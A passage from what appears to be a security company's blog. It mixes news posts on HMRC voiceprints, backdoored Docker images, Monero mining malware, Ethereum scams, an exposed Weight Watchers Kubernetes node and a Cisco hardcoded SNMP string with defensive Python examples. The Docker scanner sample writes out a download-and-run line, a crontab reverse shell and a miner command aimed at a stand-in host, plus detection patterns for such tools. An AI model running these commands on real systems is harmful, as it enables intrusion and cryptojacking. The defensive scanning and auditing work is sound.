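# Stand-in for the STARTTLS Everywhere preload list (constructed): mail domains whose
# operators have committed to always offering STARTTLS with a valid certificate.
PRELOAD_LIST = {"example.org"}


def ehlo_capabilities(reply: str) -> List[str]:
    """Parse a multi-line 250 reply. Continuation lines are "250-", the last is "250 "."""
    caps = []
    for line in reply.splitlines():
        m = re.match(r"^250[ -](.*)$", line)
        if m:
            caps.append(m.group(1).strip().upper())
    return caps[1:]  # the first line is the server's hostname, not a capability


def delivery_policy(mx_domain: str, ehlo_reply: str, preload=PRELOAD_LIST) -> str:
    """Decide how a message may be handed to this MX.

    starttls-verified       TLS with the certificate checked (domain is on the preload list)
    starttls-opportunistic  TLS without verification, what most MTAs do today
    refuse                  domain promised STARTTLS but did not offer it: treat as a downgrade
    cleartext               no TLS offered and no policy, the traditional fallback
    """
    caps = ehlo_capabilities(ehlo_reply)
    if "STARTTLS" in caps:
        return "starttls-verified" if mx_domain in preload else "starttls-opportunistic"
    return "refuse" if mx_domain in preload else "cleartext"


def starttls_context(verify: bool) -> ssl.SSLContext:
    """A bare smtplib.SMTP.starttls() call does not verify the server certificate; pass a
    context like this one (verify=True) to smtplib for preload-list domains."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED, hostname check, system CA store
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def session_transcript(mx_domain: str, ehlo_reply: str) -> Tuple[str, List[str]]:
    """The client/server exchange that follows from the policy decision, as text."""
    decision = delivery_policy(mx_domain, ehlo_reply)
    lines = ["C: EHLO sender.example.com"]
    lines += ["S: " + line for line in ehlo_reply.strip().splitlines()]
    if decision.startswith("starttls"):
        how = ("chain and hostname verified" if decision.endswith("verified")
               else "accepted without verification")
        lines += ["C: STARTTLS", "S: 220 2.0.0 Ready to start TLS",
                  "   (TLS handshake; certificate %s)" % how,
                  "C: EHLO sender.example.com   (repeated inside TLS)"]
    elif decision == "refuse":
        lines += ["C: QUIT   (policy: %s must offer STARTTLS; deferring delivery)" % mx_domain]
    else:
        lines += ["C: MAIL FROM:<alice@sender.example.com>   (cleartext)"]
    return decision, lines


if __name__ == "__main__":
    for scenario in (EHLO_WITH_STARTTLS, EHLO_STRIPPED):
        decision, lines = session_transcript("example.org", scenario)
        print(decision, *lines, sep="\n  ")
```

The parse-and-decide logic is what every MTA does implicitly; the difference the preload list makes is the refuse branch. Without a promise to compare against, a missing STARTTLS line is indistinguishable from a server that never supported it, and the only choices are to fall back or to refuse all such deliveries. Note also that Python’s smtplib.starttls() without an explicit context behaves like most MTAs and accepts any certificate; pass starttls_context(True) to enforce verification.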

 

STARTTLS Everywhere is like Let’s Encrypt, but for email

The EFF says this is where its latest project, STARTTLS Everywhere, will be able to help.

“STARTTLS Everywhere provides software that a sysadmin can run on an email server to automatically get a valid certificate from Let’s Encrypt,” the EFF says. “This software can also configure their email server software so that it uses STARTTLS, and presents the valid certificate to other email servers.”

“Finally, STARTTLS Everywhere includes a ‘preload list’ of email servers that have promised to support STARTTLS, which can help detect downgrade attacks. The net result: more secure email, and less mass surveillance.”

 


HMRC – The UK’s tax agency Recorded the Voices of 5.1 Million Brits

Category : Uncategorized


HMRC is a non-ministerial department of the UK Government responsible for the collection of taxes, the payment of some forms of state support and the administration of other regulatory regimes including the national minimum wage.

HMRC was formed by the merger of the Inland Revenue and Her Majesty’s Customs and Excise, which took effect on 18 April 2005. The department’s logo is the St Edward’s Crown enclosed within a circle.

HMRC (Her Majesty’s Revenue and Customs)— The UK’s tax agency has collected the voice records of over 5.1 million Brits, a UK-based privacy and civil liberties group has discovered.

The HMRC collected these voice records via a new service it launched in January 2017. Called Voice ID, the service allows UK citizens to authenticate when calling HMRC call centers via their voice.

 

HMRC misled users into providing a voice sample

When it launched, the HMRC website claimed users would be able to opt out of using this feature and continue to authenticate and prove their identity via the usual methods.

But an investigation by the privacy group Big Brother Watch found that there is no opt-out when calling the HMRC support line: every caller was pushed into recording a voiceprint for the Voice ID service.

The only way to avoid creating a voiceprint was to say “no” three times during the enrollment prompt, something the group’s investigators discovered on their own.

Unfortunately, the Voice ID system did not remember that refusal, and it would pester the caller for a voice sample every time they called back.

 

Privacy group: HMRC broke the law

Big Brother Watch argues that HMRC violated users’ rights by not providing a simple way of opting out.

Furthermore, after a lengthy and complicated process, users can only opt out of using voice recognition for authentication; they cannot have their voiceprints deleted from HMRC’s database.

The privacy group argues that HMRC is in clear violation of the GDPR (the EU data protection regulation, in force in the UK since 25 May 2018) by not asking Brits for explicit consent, which the regulation requires for biometric data, and by not giving them an easy way to withdraw that consent and have their biometric data erased.

 

ICO is investigating

Big Brother Watch is now urging users to file a complaint with HMRC and a second complaint about HMRC with the UK’s Information Commissioner’s Office (ICO), the national data protection authority.

The privacy group says it already notified ICO officials on its own, and the latter started an official investigation into HMRC’s practices.

 


Docker Images Removed From Docker Hub

Category : Blog


Docker is a computer program that performs operating-system-level virtualization also known as containerization. It is developed by Docker, Inc. Docker is primarily developed for Linux, where it uses the resource isolation features of the Linux kernel such as cgroups and kernel namespaces.

The Docker team has pulled 17 Docker container images that have been backdoored and used to install reverse shells and cryptocurrency miners on users’ servers for the past year.

The malicious Docker container images have been uploaded on Docker Hub, the official repository of ready-made Docker images that sysadmins can pull and use on their servers, work, or personal computers.

These images let sysadmins start an application container within seconds, without having to build and maintain their own image, something not every user has the time or expertise to do.

 

Malicious Docker images remained online for a year

Just as has happened with other package repositories in the past, such as PyPI and npm, malicious actors uploaded malicious packages to the main Docker Hub repository.

Because new Docker images go through no security audit or testing before publication, these images were listed on the Docker Hub portal right away, where they remained available between May 2017 and May 2018, when the Docker team finally intervened to pull them down.

All 17 images were uploaded to Docker Hub by the same person or group, using the pseudonym “docker123321.” Some of these images were pulled more than one million times, others hundreds of thousands of times.

 

Took a while before users caught on to what was happening

Signs that something was wrong in the Docker and Kubernetes (the orchestrator used to run containers at scale) ecosystem started appearing last September and continued through the winter. Users reported malicious activity on their cloud servers running Docker and Kubernetes, and reports of security incidents involving Docker images were posted on GitHub and Twitter.

Several security firms and security researchers such as Sysdig, Aqua Security, and Alexander Urcioli also published reports about security incidents they’ve observed.

 

Malicious Docker images taken offline

While the number of security incidents grew, it was only when Fortinet and Kromtech got involved that all the pieces were put together and researchers traced the incidents back to the docker123321 account.

Docker removed the 17 backdoored images from Docker Hub on May 10, this year, a week after Fortinet published a report about some of the cryptocurrency mining incidents linking back to Docker images created by the docker123321 account.

 

Some affected servers may still be compromised

Kromtech researchers warn that some of these images also contained backdoor-like capabilities thanks to the embedded reverse shells.

This means that even if victims stopped using or removed the malicious Docker images, the attacker could easily have established persistence on the host by other means (a scheduled job or an added SSH key, for example), retaining access to the system at a later time. A host that ran one of these images should therefore be treated as compromised and rebuilt, not merely cleaned of the image.
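A way to check an image for the kind of payloads described above before running it, as an added example that is not part of the original report or of Docker’s tooling. It scans the build steps recorded in an image’s history (the CREATED BY column of docker history --no-trunc, or the created_by entries of the image configuration blob) for indicators of reverse shells, miners, persistence and download-and-execute steps; the indicator list and both sample histories are constructed, with the documentation address 198.51.100.7 standing in for an attacker host:

```python
import re
from typing import Dict, List, Tuple

# Indicator patterns for image build steps. Constructed for this example, not a
# published ruleset; extend them for your own environment.
INDICATORS: Dict[str, List[str]] = {
    "reverse-shell": [r"/dev/tcp/", r"\bnc\b.*\s-e\s", r"\bbash -i\b", r"\bsocat\b.*\bexec:"],
    "miner": [r"\bxmrig\b", r"\bminerd\b", r"\bcpuminer\b", r"stratum\+tcp://"],
    "persistence": [r"\bcrontab\b", r"/etc/cron", r"\.ssh/authorized_keys", r"/etc/rc\.local"],
    "download-and-run": [r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"],
}


def scan_image_history(history: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Check every recorded build step (the created_by field) against the indicators.
    Returns (layer index, category, step excerpt) for each hit."""
    findings = []
    for idx, layer in enumerate(history):
        step = layer.get("created_by", "")
        for category, patterns in INDICATORS.items():
            if any(re.search(p, step) for p in patterns):
                findings.append((idx, category, step.strip()[:80]))
    return findings


def categories(findings: List[Tuple[int, str, str]]) -> List[str]:
    """Distinct indicator categories present, sorted, for a quick verdict."""
    return sorted({category for _, category, _ in findings})


# Constructed history of a hypothetical trojanized application image, in the shape
# of the history entries in an image configuration. 198.51.100.7 is a documentation
# address standing in for an attacker-controlled host.
TROJANIZED_HISTORY = [
    {"created_by": "/bin/sh -c #(nop) ADD file:0123456789abcdef in /"},
    {"created_by": "/bin/sh -c apt-get update && apt-get install -y tomcat8"},
    {"created_by": "/bin/sh -c curl -s http://198.51.100.7/x.sh | sh"},
    {"created_by": "/bin/sh -c echo '* * * * * root bash -i >& /dev/tcp/198.51.100.7/4444 0>&1' >> /etc/crontab"},
    {"created_by": '/bin/sh -c #(nop) CMD ["xmrig" "-o" "stratum+tcp://198.51.100.7:3333"]'},
]

CLEAN_HISTORY = [
    {"created_by": "/bin/sh -c #(nop) ADD file:0123456789abcdef in /"},
    {"created_by": "/bin/sh -c apt-get update && apt-get install -y tomcat8"},
    {"created_by": '/bin/sh -c #(nop) CMD ["catalina.sh" "run"]'},
]


if __name__ == "__main__":
    for layer, category, step in scan_image_history(TROJANIZED_HISTORY):
        print(f"layer {layer}: {category}: {step}")
```

History scanning catches payloads wired in at build time but not binaries that were simply copied in, so pair it with a filesystem or vulnerability scan of the image and, above all, pull images by digest (image@sha256:...) rather than by mutable tag, so that a tag cannot be silently repointed at a different image later.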

 


Monero Currently in Circulation Has Been Mined Using Malware

Category : Blog


About 5% of the Monero cryptocurrency currently in circulation has been mined using malware, and about 2% of the network’s total daily hashrate comes from devices infected with cryptocurrency-mining malware. These numbers are the results of in-depth research of the coin-mining malware scene by security researchers from Palo Alto Networks.

The report, released June 11, analyzed 629,126 malware samples that have been detected as part of coin-mining operations. The research didn’t analyze in-browser miners (cryptojackers), only traditional malware families that have infected desktops and servers since June last year, when there was a significant spike in coin-mining operations.

The research team at Palo Alto could measure this because coin-mining malware must carry, hard-coded in its binary or its configuration, the address of the mining pool it connects to and the Monero wallet address to which the pool pays out the proceeds.

 

Monero is the most popular cryptocoin

According to the researchers, 84% of all malware samples they detected were focused on mining Monero, by far the most popular coin among malware groups.

Because those two values, the pool and the wallet address, can be extracted from each sample, the researchers were able to track most of the money these groups generated on infected devices.

By querying nine mining pools that expose per-address payment statistics with the 2,341 Monero addresses found embedded in the 531,663 samples that mined Monero, they were able to estimate how much these groups have made in the past year.
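The extraction step that makes this measurement possible, as an added example that is not Palo Alto Networks’ own tooling. It pulls Monero wallet addresses and pool endpoints out of the printable strings of samples and groups the samples by wallet; the regular expressions encode the real address format, while the wallet addresses, sample names and pool hosts are constructed for the example:

```python
import re
from typing import Any, Dict, List, Set, Tuple

# Monero's base58 alphabet omits 0, O, I and l. Standard addresses start with 4 and are
# 95 characters long, subaddresses start with 8 (95 chars), integrated addresses with 4
# (106 chars).
B58 = r"[1-9A-HJ-NP-Za-km-z]"
XMR_ADDRESS = re.compile(rf"(?<!{B58})(?:4{B58}{{105}}|[48]{B58}{{94}})(?!{B58})")
# Pool endpoints show up either as stratum URLs or as the argument of a miner's -o/--url flag.
POOL_URL = re.compile(r"stratum\+(?:tcp|ssl)://([\w.-]+):(\d{2,5})")
POOL_FLAG = re.compile(r"(?:-o|--url)[=\s]+(?:stratum\+(?:tcp|ssl)://)?([\w.-]+):(\d{2,5})")

# Constructed wallet addresses (valid shape, not real wallets) and constructed output
# of `strings` on three hypothetical samples. Hosts use the reserved .invalid TLD.
FAKE_ADDR_A = "4" + ("AB1cd2EF3gh4JK5mn6PQ7rs8TU9vw" * 4)[:94]
FAKE_ADDR_B = "4" + ("Zy9Xw8Vu7Ts6Rq5Pn4Mk3Jh2Gf1Dc" * 4)[:94]
SAMPLE_STRINGS: Dict[str, List[str]] = {
    "sample-001.exe": ["xmrig", f"-o stratum+tcp://pool.example.invalid:3333 -u {FAKE_ADDR_A} -p x"],
    "sample-002.elf": ["--url=pool.example.invalid:5555", f"--user={FAKE_ADDR_A}", "--donate-level=1"],
    "sample-003.exe": [f'"pool": "stratum+tcp://mine.example.invalid:443", "wallet": "{FAKE_ADDR_B}"'],
}


def extract_iocs(strings: List[str]) -> Tuple[Set[str], Set[Tuple[str, str]]]:
    """Wallet addresses and (host, port) pool endpoints found in one sample's strings."""
    blob = "\n".join(strings)
    wallets = set(XMR_ADDRESS.findall(blob))
    pools = set(POOL_URL.findall(blob)) | set(POOL_FLAG.findall(blob))
    return wallets, pools


def correlate(samples: Dict[str, List[str]]) -> Dict[str, Dict[str, Any]]:
    """Group samples by the wallet they pay into: one wallet seen across many samples is
    one operation, and the wallet is the key you would later query the pools with."""
    by_wallet: Dict[str, Dict[str, Any]] = {}
    for name, strings in samples.items():
        wallets, pools = extract_iocs(strings)
        for wallet in wallets:
            entry = by_wallet.setdefault(wallet, {"samples": [], "pools": set()})
            entry["samples"].append(name)
            entry["pools"].update(pools)
    return by_wallet


if __name__ == "__main__":
    for wallet, info in correlate(SAMPLE_STRINGS).items():
        print(wallet[:12] + "...", len(info["samples"]), "samples", sorted(info["pools"]))
```

The resulting wallet list is what one would feed to the pools’ per-address statistics endpoints to obtain payouts and hash rate, which is how the figures in the next section were derived. A regex alone will also accept strings that merely look like addresses; verifying the checksum (the last four bytes of the decoded address are the first four bytes of Keccak-256 over the rest) filters those out and is left out here.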

 

Malware groups made over $108 million worth of Monero

According to Palo Alto Networks researchers, criminal groups have mined an approximate total of 798,613.33 Monero coins (XMR) using malware on infected devices.

That’s over $108 million in US currency, just from coin-mining operations alone. This sum also represents around 5% of all the Monero currently in circulation —15,962,350 XMR.

Furthermore, since mining pools also report each address’s hash rate (the number of hash computations per second its miners submit), the researchers were able to estimate how much hashing power the coin-mining botnets have been contributing per day.

Researchers say that during the past year, infected devices were responsible for 19,503,823.54 hashes/second, which is roughly 2% of the entire hashing power of the Monero network.

 


Ethereum “Giveaway” Scammers Have Tricked People Out of $4.3 Million

Category : Blog


Ethereum is a distributed public blockchain network. Where Bitcoin’s blockchain tracks ownership of a single currency, the Ethereum blockchain focuses on running the code of decentralized applications (smart contracts).

In the Ethereum blockchain, instead of mining for bitcoin, miners work to earn Ether, the token that pays for computation on the network.

Online crooks promoting fake “giveaways” have tricked people out of 8,148 Ether, currently worth around $4.3 million, according to statistical data compiled in EtherScamDB.

The EtherScamDB website was created by the team behind the MyCrypto wallet service to track the various online scams that center on the Ethereum platform and its associated cryptocurrencies and assets.

For the past few months, the website has been cataloguing Ethereum scams of several kinds: classic phishing sites that imitate legitimate apps and wallets, trust-trading sites that push inaccurate advice or recommendations, and online giveaway scams that promise to multiply Ether funds if victims first transfer the crooks a small sum.

 

Twitter’s “Ether giveaway” scam problem

The latter category has recently become rampant on Twitter, and on a daily basis, the social network’s most popular tweets are often inundated by these “Ether giveaway” scams.

More precisely, this particular trend caught fire with crooks this past February after Bleeping Computer reported that one scammer made $5,000 in a single night just by posing as Elon Musk, John McAfee, and a few other celebrities on Twitter.

Soon after that report, scams of this type flooded Twitter, with crooks registering accounts with names similar to legitimate ones and then posting misleading messages asking users to send funds to an Ethereum address in order to receive a multiplied sum back as part of a limited-time giveaway.

 

EtherScamDB tracks hundreds of fake giveaway addresses

Some of these scams, and the Ethereum addresses where crooks have been collecting “donations” for the fake giveaways, have been tracked in EtherScamDB.

According to a recent tweet by John Backus, founder of Bloom and Cognito, two blockchain-powered apps, crooks promoting these giveaway scams have collected 8,148 Ether ($4.3 million) in the 468 Ethereum addresses tracked by the site.

The real total is certainly larger, since the site does not track every giveaway scam, but even this partial count shows how big the problem has become.

 

Twitter’s been slow to react

Twitter, in particular, has been slow to respond to users reporting fake accounts, sometimes taking days or weeks to suspend obvious clones. Nevertheless, with a limited support staff, and with all the hate speech and terrorist propaganda happening on the platform, it is somewhat understandable why Twitter has been slow to react.

In the meantime, spreading the word about this scam is probably the best way to educate users and remind them to pay attention to the Twitter handle from which these offers are being made.

But while some might think the consensus advice is to tell users to “pay attention to the Twitter handle pushing an Ethereum giveaway,” the actual sensible advice is to “not participate in giveaways” to begin with, since most of these are just plain ol’ scams.

 


Weight Watchers IT Infrastructure Exposed via No-Password Kubernetes Server

Category : Blog

Weight Watchers suffered a small security breach

Weight Watchers is the registered trademark of Weight Watchers International, Inc.

Just like many companies before it, weight loss program Weight Watchers suffered a small security breach after security researchers found a crucial server exposed on the Internet that was holding the configuration info for some of the company’s IT infrastructure.

The exposed server was a Kubernetes instance. Kubernetes is container orchestration software for deploying and managing application containers across a fleet of servers, usually on a cloud infrastructure.

Dozens of servers containing Weight Watcher’s data were left exposed after the company failed to password protect software used for managing application containers, according to German cybersecurity firm Kromtech.

An Amazon cloud infrastructure used by Weight Watchers was left vulnerable—46 Amazon S3 buckets in total—including logs, passwords, and private encryption keys, Kromtech found.

 

Weight Watchers ran a no-password Kubernetes instance

Researchers from German cyber-security firm Kromtech discovered that Weight Watchers had left one of its Kubernetes instances reachable from the internet without a password.

The service in question listened on port 10250, the port of the kubelet API that runs on every Kubernetes node. With anonymous access left enabled, anyone who found the host could query it without a username or password and, for example, list the running pods, read the configuration injected into them and, depending on the authorization mode, run commands inside their containers.

All in all, the Kubernetes instances exposed an administrator’s root credentials, access keys for 102 of the company’s domains, and 31 IAM users, including users with administrative credentials and applications with programmatic access.

Weight Watchers added that its internal team and a third-party forensics company investigated the incident and that “each has independently confirmed that there was no indication that any personally identifiable information was exposed,” a spokesperson said.

The exposure was the result of a misconfigured Kubernetes instance, Kromtech said. Kubernetes is a tool originally developed by Google for managing large numbers of containerized applications. Notably, a Kubernetes instance on Tesla’s cloud infrastructure was hacked earlier this year, and then used by the perpetrators to mine cryptocurrency.
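What “no password” means for the component involved and how to check a node’s configuration for it, as an added example that is not from Kromtech’s report or the Kubernetes project. The kubelet on every node listens on port 10250; the two configurations below are constructed, the weak one reproducing the reachable-without-credentials state the article describes and the hardened one the settings that close it, and the audit function flags the differences:

```python
from typing import Any, Dict, List

# Two KubeletConfiguration objects (kubelet.config.k8s.io/v1beta1) written as Python
# dicts so the example runs without a YAML library. File paths and values are
# constructed for this example.
WEAK_KUBELET: Dict[str, Any] = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "port": 10250,
    "readOnlyPort": 10255,
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}, "x509": {}},
    "authorization": {"mode": "AlwaysAllow"},
}

HARDENED_KUBELET: Dict[str, Any] = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "port": 10250,
    "readOnlyPort": 0,                      # 0 disables the unauthenticated read-only API
    "authentication": {
        "anonymous": {"enabled": False},   # unauthenticated requests get 401
        "webhook": {"enabled": True},      # bearer tokens checked against the API server
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},  # client certificates
    },
    "authorization": {"mode": "Webhook"},   # SubjectAccessReview per request
}


def audit_kubelet(cfg: Dict[str, Any]) -> List[str]:
    """Return one finding per setting that leaves the kubelet API open. Missing keys are
    taken as the v1beta1 config-file defaults (anonymous off, Webhook authorization,
    read-only port disabled)."""
    findings = []
    auth = cfg.get("authentication", {})
    authz = cfg.get("authorization", {})
    port = cfg.get("port", 10250)

    if auth.get("anonymous", {}).get("enabled", False):
        findings.append(f"anonymous authentication enabled: any client can reach port {port}")
    if authz.get("mode", "Webhook") == "AlwaysAllow":
        findings.append("authorization mode AlwaysAllow: every request, anonymous included, is authorized")
    read_only = cfg.get("readOnlyPort", 0)
    if read_only:
        findings.append(f"readOnlyPort {read_only} enabled: pod specs readable with no authentication")
    has_webhook = auth.get("webhook", {}).get("enabled", False)
    has_x509 = bool(auth.get("x509", {}).get("clientCAFile"))
    if not (has_webhook or has_x509):
        findings.append("no client authentication method (webhook or x509 clientCAFile) configured")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_KUBELET), ("hardened", HARDENED_KUBELET)):
        print(name, audit_kubelet(cfg) or ["ok"])
```

From the outside, a GET to https://<node>:10250/pods that returns pod JSON is the weak state, while the hardened one answers 401 Unauthorized. Keep in mind that the kubelet config-file API defaults to the safe values when a key is absent, whereas the legacy command-line flags default the other way (anonymous-auth=true, authorization-mode=AlwaysAllow, read-only-port=10255), which is how clusters set up with flags end up in the weak state.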

 

Unclear what data was exposed

It is unclear if someone else besides the Kromtech team discovered this Kubernetes instance, but an attacker with access to this server would have been able to access a large part of Weight Watchers’ network.

It is also unclear what kind of data (user details?) these servers were storing, as the Kromtech team could not go wandering off inside Weight Watchers’ network without violating a slew of laws.

Kromtech’s Bob Diachenko and his team said they reported the exposed server to Weight Watchers, who quickly remediated the issue and thanked the researchers.

 

Weight Watchers claims it was a non-production network

“We really appreciate the community working to make us all safer,” a Weight Watchers spokesperson said in its response to Kromtech.

“We have confirmed the issue – a security group for a test cluster in our non-production account was misconfigured during testing. The issue should be resolved and keys should be revoked. We’ve also implemented some safeguards to protect against this issue from recurrence.”

But Kromtech disputes Weight Watchers’ explanation that this was a non-production account. Nonetheless, today, a Weight Watchers spokesperson stood by its initial statement.

“Last week, Weight Watchers received a report from security researchers related to the exposure of credentials in one non-production AWS account,” a company spokesperson told Bleeping Computer via email. “The account was in a testing environment clearly labeled ‘nonprod’ and is used only to test new services and features.”

“To be able to test and innovate securely, we keep test environments completely separate from production environments. Our internal team and a reputable third-party security forensics team have investigated the exposed account key scope and activity, and each has independently confirmed that there was no indication that any personally identifiable information was exposed,” the spokesperson told us.
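The spokesperson’s account points at a security group on a test cluster as the misconfiguration. As an added example (not code from the article, from Kromtech or from Weight Watchers), the script below audits security group ingress rules in the shape boto3’s describe_security_groups returns and flags a Kubernetes API port reachable from the whole internet; the group IDs, address ranges and the choice of port 6443 are assumptions for the sample, since the article does not say which port was exposed.

```python
"""Audit AWS security group ingress rules for a Kubernetes API port reachable from anywhere."""

KUBE_API_PORT = 6443                 # default kube-apiserver port (assumed target of the check)
WORLD = {"0.0.0.0/0", "::/0"}        # "anywhere" ranges for IPv4 and IPv6


def rule_covers_port(perm, port):
    """True if an IpPermissions entry applies to `port`; all-traffic rules use protocol "-1"."""
    proto = perm.get("IpProtocol")
    if proto == "-1":
        return True
    if proto not in ("tcp", "6"):
        return False
    return perm.get("FromPort", -1) <= port <= perm.get("ToPort", -1)


def rule_open_to_world(perm):
    """True if any IPv4 or IPv6 range on the rule is the whole internet."""
    ranges = {r.get("CidrIp") for r in perm.get("IpRanges", [])}
    ranges |= {r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])}
    return bool(ranges & WORLD)


def find_exposed_api(groups, port=KUBE_API_PORT):
    """Return (group_id, protocol, from_port, to_port) for each rule exposing `port` publicly."""
    findings = []
    for sg in groups:
        for perm in sg.get("IpPermissions", []):
            if rule_covers_port(perm, port) and rule_open_to_world(perm):
                findings.append((sg["GroupId"], perm.get("IpProtocol"),
                                 perm.get("FromPort"), perm.get("ToPort")))
    return findings


# Constructed sample in the shape boto3's describe_security_groups returns (hypothetical IDs):
# the first group repeats the "test cluster" mistake, the second keeps the API on an internal range.
SAMPLE_GROUPS = [
    {"GroupId": "sg-test-cluster", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 6443, "ToPort": 6443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-prod-cluster", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 6443, "ToPort": 6443,
         "IpRanges": [{"CidrIp": "10.20.0.0/16"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
]

if __name__ == "__main__":
    for gid, proto, lo, hi in find_exposed_api(SAMPLE_GROUPS):
        print(f"{gid}: {proto} {lo}-{hi} open to the internet on the Kubernetes API port")
```

The same function run against the live output of describe_security_groups (one call per region) gives a quick inventory of clusters whose control plane is exposed, including those in accounts labelled non-production.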

Weight Watchers is certainly not the first company to have to deal with a leaky or unprotected server. Other companies that suffered a similar fate include Tesla, Honda, Universal, and Bezop, just to name a few.

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

Cisco Removes Backdoor Account, Fourth in the Last Four Months

Category : Blog

Cisco is the largest networking company in the world. The stock was added to the Dow Jones Industrial Average on June 8, 2009, and is also included in the S&P 500 Index, the Russell 1000 Index, NASDAQ-100 Index and the Russell 1000 Growth Stock Index.

For the fourth time in as many months, Cisco has removed hardcoded credentials that were left inside one of its products, which an attacker could have exploited to gain access to devices and inherently to customer networks.

This time around, the hardcoded password was found in Cisco’s Wide Area Application Services (WAAS), a software package that runs on Cisco hardware and optimizes WAN traffic.


Hardcoded SNMP community string

This backdoor mechanism (CVE-2018-0329) was in the form of a hardcoded, read-only SNMP community string in the configuration file of the SNMP daemon.

SNMP stands for Simple Network Management Protocol, an Internet protocol for collecting data about and from remote devices. The community string was there so that SNMP managers that knew its value could connect to the remote Cisco device and gather statistics and system information about it.


Hardcoded creds are invisible to device owners

Making matters worse, this SNMP community string is hidden from device owners, even from the ones with an admin account, meaning they couldn’t have located it on their own during regular security audits.

The string came to light by accident, while security researcher Aaron Blair from RIoT Solutions was researching another WAAS vulnerability (CVE-2018-0352).

This second vulnerability was a privilege escalation in the WAAS disk check tool that allowed Blair to elevate his account’s access level from “admin” to “root.” Normally, Cisco users are permitted only admin access. The root user level grants access to the underlying OS files and is typically reserved for Cisco engineers.


WAAS updates released to remove hardcoded SNMP creds

The researcher reported the issue to Cisco in March, and Cisco released updates for WAAS this week. There are no mitigations or workarounds, so users must apply the WAAS software updates.

The Cisco WAAS patches are part of a batch of 28 security fixes that Cisco released this week, on June 6.

Twice in March and again in May, Cisco removed other similar backdoor accounts and mechanisms from other software, such as Prime Collaboration Provisioning (PCP), the IOS XE operating system, and the Digital Network Architecture (DNA) Center. Unlike this latest issue, the first three were discovered by Cisco engineers during internal audits.
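Because the community string was invisible in the device’s own configuration, the practical place to catch its use is the network: SNMP v1 and v2c send the community string in cleartext on UDP/161, so a sensor can compare what is actually used against what the owner configured. The block below is an added example, not code from the article or from Cisco; it parses the BER header of an SNMP payload and flags v1/v2c requests whose community is not on the owner’s allowlist. The packet bytes and the allowlisted community name are constructed for the example.

```python
"""Extract the SNMP version and community string from a raw UDP/161 payload and
flag v1/v2c requests whose community is not one the device owner configured."""


def read_tlv(buf, pos):
    """Decode one BER TLV at `pos`; returns (tag, value, position after the TLV)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                              # long form: low bits count the length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_snmp_header(pkt):
    """Return (version, community); community is None for SNMPv3, which carries a USM header instead."""
    tag, body, _ = read_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("outer SEQUENCE missing: not an SNMP message")
    tag, ver, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    version = int.from_bytes(ver, "big")           # 0 = SNMPv1, 1 = SNMPv2c, 3 = SNMPv3
    if version == 3:
        return version, None
    tag, community, _ = read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community OCTET STRING missing")
    return version, community.decode("latin-1")


def unexpected_community(pkt, allowed):
    """True when a v1/v2c request uses a community string outside the owner's allowlist."""
    version, community = parse_snmp_header(pkt)
    return version < 3 and community not in allowed


# Constructed SNMPv2c GetRequest: version 1 (v2c), community "public", empty varbind list.
V2C_PUBLIC = bytes.fromhex("3018" "020101" "04067075626c6963"
                           "a00b" "020101" "020100" "020100" "3000")
# Constructed, minimal SNMPv3 header: just the outer SEQUENCE and the version INTEGER 3.
V3_HEADER = bytes.fromhex("3003" "020103")

if __name__ == "__main__":
    allowlist = {"mon-ro-2018"}                    # hypothetical community the owner configured
    for name, pkt in (("v2c", V2C_PUBLIC), ("v3", V3_HEADER)):
        print(name, parse_snmp_header(pkt), "ALERT" if unexpected_community(pkt, allowlist) else "ok")
```

Fed with the UDP payloads a capture tool hands it, the check turns a string that never appears in the admin interface into an alert the moment anything on the network uses it.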

 
